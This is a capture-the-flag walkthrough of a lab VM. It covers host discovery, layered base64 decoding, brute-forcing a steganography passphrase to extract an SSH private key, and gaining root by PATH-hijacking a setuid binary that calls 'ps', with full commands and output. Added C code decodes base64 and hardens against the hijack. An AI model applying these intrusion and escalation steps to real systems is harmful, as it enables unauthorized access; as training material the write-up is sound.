Contents
- Subnet scan
- Hidden directory
- Steganography
- Trying to connect over SSH
- Privilege escalation
- PATH hijacking
Subnet scan
nmap -sn performs a host-discovery (ping) sweep: it only reports which hosts on the target network are up and does no port scanning.
┌──(root㉿kali)-[~/Downloads]
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 23:55 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00033s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:E8:39:64 (VMware)
Nmap scan report for 10.10.10.11
Host is up (0.00035s latency).
MAC Address: 00:0C:29:D1:8E:56 (VMware)
Nmap scan report for 10.10.10.240
Host is up (0.00032s latency).
MAC Address: 00:50:56:E4:2E:A9 (VMware)
Nmap scan report for 10.10.10.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.10 seconds
Browsing to 10.10.10.11 directly works; it is an article about Dragon Ball.
Looking at the page source, there is a base64-encoded string at the very bottom.
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d
UkZKQlIwOU9JRUpCVEV3PQ==
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d
RFJBR09OIEJBTEw=
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d| base64 -d
DRAGON BALL
robots.txt (a sensitive file you should check even without running a directory scan) also contains a base64-encoded string.
Hidden directory
Hint: you need to find the hidden directory. The decode above gave DRAGON BALL, which suggests the name of a hidden directory; browsing to it works.
secret.txt lists a dozen or so directories, but none of them are accessible.
The vulnhub folder holds one image and one login page (I did not want to try weak passwords on the login page, so I guessed the image contains hidden data).
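Peeling nested base64 layers one pipe at a time, as in the three echo | base64 -d commands above, gets tedious when the depth is unknown. The following C program is an added example (not code from the original write-up): it decodes repeatedly until the output is no longer well-formed base64 or stops being printable text, which generalizes the three-step decode shown above and also handles the robots.txt string or any other layered value. The decoder itself and the b64_peel / peel_check function names are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Map one base64 alphabet character to its 6-bit value, or -1 if invalid. */
static int b64_value(int c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode one base64 layer from `in` into `out` (NUL-terminated).
   Returns the number of decoded bytes, or -1 if `in` is not well-formed
   base64 (bad length, stray characters, or data after '=' padding). */
static int b64_decode(const char *in, unsigned char *out, size_t out_cap) {
    size_t len = strlen(in);
    if (len == 0 || len % 4 != 0) return -1;
    size_t n = 0;
    for (size_t i = 0; i < len; i += 4) {
        int v[4];
        int pad = 0;
        for (int k = 0; k < 4; k++) {
            int c = in[i + k];
            if (c == '=') {
                /* padding is only legal in the last two slots of the final quantum */
                if (i + 4 != len || k < 2) return -1;
                v[k] = 0;
                pad++;
            } else {
                if (pad) return -1;          /* real data after padding */
                v[k] = b64_value(c);
                if (v[k] < 0) return -1;
            }
        }
        unsigned char bytes[3] = {
            (unsigned char)((v[0] << 2) | (v[1] >> 4)),
            (unsigned char)(((v[1] & 0x0f) << 4) | (v[2] >> 2)),
            (unsigned char)(((v[2] & 0x03) << 6) | v[3]),
        };
        int keep = 3 - pad;
        if (n + keep + 1 > out_cap) return -1;
        memcpy(out + n, bytes, keep);
        n += keep;
    }
    out[n] = '\0';
    return (int)n;
}

/* Peel base64 layers until the result is no longer valid base64, is not
   printable text, or `max_layers` is reached. Writes the final text to `out`
   and returns the number of layers removed (0 = input was not base64). */
int b64_peel(const char *in, char *out, size_t out_cap, int max_layers) {
    char cur[1024];
    unsigned char next[1024];
    int layers = 0;
    snprintf(cur, sizeof cur, "%s", in);
    while (layers < max_layers) {
        int n = b64_decode(cur, next, sizeof next);
        if (n < 0) break;
        /* stop at the first non-printable layer: that is binary data, not another encoding */
        int printable = 1;
        for (int i = 0; i < n; i++)
            if (next[i] < 0x20 || next[i] > 0x7e) { printable = 0; break; }
        if (!printable) break;
        memcpy(cur, next, (size_t)n + 1);
        layers++;
    }
    snprintf(out, out_cap, "%s", cur);
    return layers;
}

/* Convenience wrapper: number of layers peeled if the final text equals
   `expected`, otherwise -1. */
int peel_check(const char *in, const char *expected) {
    char out[1024];
    int layers = b64_peel(in, out, sizeof out, 16);
    return strcmp(out, expected) == 0 ? layers : -1;
}

int main(void) {
    /* the string taken from the page source in the walkthrough above */
    char out[256];
    int layers = b64_peel("VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09", out, sizeof out, 16);
    printf("%d layer(s): %s\n", layers, out);   /* 3 layer(s): DRAGON BALL */
    return 0;
}
```

The printable-text stop condition matters: a plaintext that happens to be a multiple of four bytes long and drawn from the base64 alphabet would otherwise be "decoded" one layer too far into garbage.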
Steganography
┌──(root㉿kali)-[~/Downloads]
└─# binwalk aj.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

┌──(root㉿kali)-[~/Downloads]
└─# exiftool aj.jpg
ExifTool Version Number : 12.49
File Name : aj.jpg
Directory : .
File Size : 75 kB
File Modification Date/Time : 2021:01:05 06:09:29-05:00
File Access Date/Time : 2024:03:15 00:10:18-04:00
File Inode Change Date/Time : 2024:03:15 00:09:54-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 959
Image Height : 535
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 959x535
Megapixels : 0.513
┌──(root㉿kali)-[~/Downloads]
└─# stegseek aj.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "love"
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".
stegseek brute-forced the passphrase and extracted an id_rsa (SSH private key) file hidden inside aj.jpg.
Trying to connect over SSH
Guessed the usernames DRAGON, root and admin; none worked, so I went back and looked again.
Noticed the name xmen and tried it.
Login succeeded.
Privilege escalation
The script directory contains demo.c and an executable named shell. Running shell shows that demo.c is its source. Because demo.c calls ps by bare name, the idea is to replace the ps that gets found, or create my own ps file, so that the setuid binary runs my file instead.
xmen@debian:~$ ls
local.txt script
xmen@debian:~$ cat local.txt
your falg :192fb6275698b5ad9868c7afb62fd555
xmen@debian:~$ cd script/
xmen@debian:~/script$ ls
demo.c shell
xmen@debian:~/script$ cat demo.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */
int main(void)
{
    setuid(0); setgid(0);   /* setuid binary: stay root for the whole run */
    system("ps");           /* bare name: resolved through the caller's PATH */
    return 0;
}
xmen@debian:~/script$ ./shell
  PID TTY          TIME CMD
 1176 pts/1    00:00:00 shell
 1177 pts/1    00:00:00 sh
 1178 pts/1    00:00:00 ps
PATH hijacking
First create a file named ps containing /bin/bash; when root executes it, it spawns an interactive root shell. Make it executable. which ps shows that ps lives in /usr/bin, and echo $PATH prints the search path. export PATH=.:$PATH prepends the current directory; running echo $PATH again confirms it was added, and which ps now resolves to the ps in the current directory, so any bare call to ps runs that file. Running ./script/shell then executes the setuid binary and hands over a root shell.
xmen@debian:~/script$ cd ../
xmen@debian:~$ echo "/bin/bash" >ps
xmen@debian:~$ chmod +x ps
xmen@debian:~$ ls
local.txt ps script
xmen@debian:~$ which ps
/usr/bin/ps
xmen@debian:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
xmen@debian:~$ export PATH=.:$PATH
xmen@debian:~$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
xmen@debian:~$ which ps
./ps
xmen@debian:~$ ./script/shell
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(xmen)
root@debian:~# cd /root
root@debian:/root# ls
proof.txt
root@debian:/root# cat proof.txt
[ASCII-art banner]
join channel: https://t.me/joinchat/St01KnXzcGeWMKSC
your flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2
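The root cause of the escalation above is that the setuid binary calls system("ps") with a bare command name and inherits the caller's PATH, so prepending "." to PATH is enough to redirect it. As an added example (not code from the original write-up or from the VM's own files), the C program below shows the two defender-side pieces: a path_is_safe check that flags a PATH containing relative or empty entries, such as the .:/usr/local/bin:... value built in the transcript, and a run_ps_hardened routine that does what demo.c meant to do but with an absolute path, a fixed minimal environment and no shell in between. The function names and the /usr/bin/ps location (the one which ps reported above) are this example's assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Return 1 if every PATH entry is an absolute directory, 0 if any entry is
   empty (the shell treats "" as the current directory), "." or otherwise
   relative. This is the check an audit script would apply to the PATH a
   privileged program is about to trust. */
int path_is_safe(const char *path) {
    if (path == NULL || *path == '\0') return 0;
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t n = sep ? (size_t)(sep - p) : strlen(p);
        if (n == 0 || p[0] != '/') return 0;   /* empty or relative entry */
        if (!sep) return 1;
        p = sep + 1;
    }
}

/* Hardened replacement for demo.c's system("ps"): absolute path, a fixed
   environment that discards whatever PATH the caller set, and execve instead
   of a shell. Returns ps's exit status, or -1 on error. */
int run_ps_hardened(void) {
    char *const argv[] = {"ps", NULL};
    char *const envp[] = {"PATH=/usr/bin:/bin", NULL};  /* caller's PATH is not used */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/usr/bin/ps", argv, envp);   /* assumed location, as in the transcript */
        _exit(127);                          /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed PATH values: the first is the one built in the walkthrough,
       the second is the clean default the user started with. */
    printf("hijacked PATH safe? %d\n", path_is_safe(".:/usr/local/bin:/usr/bin:/bin"));  /* 0 */
    printf("default  PATH safe? %d\n", path_is_safe("/usr/local/bin:/usr/bin:/bin"));     /* 1 */
    return run_ps_hardened() == 0 ? 0 : 1;
}
```

Note that the fix is not only the absolute path: even with /usr/bin/ps hard-coded, a program that still goes through system() inherits the caller's environment and a /bin/sh invocation, so the explicit envp in execve is what removes the attacker-controlled input entirely.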